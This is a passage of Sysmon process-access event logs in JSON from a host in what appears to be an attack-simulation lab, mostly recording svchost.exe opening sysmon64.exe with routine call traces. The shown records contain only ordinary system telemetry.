C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 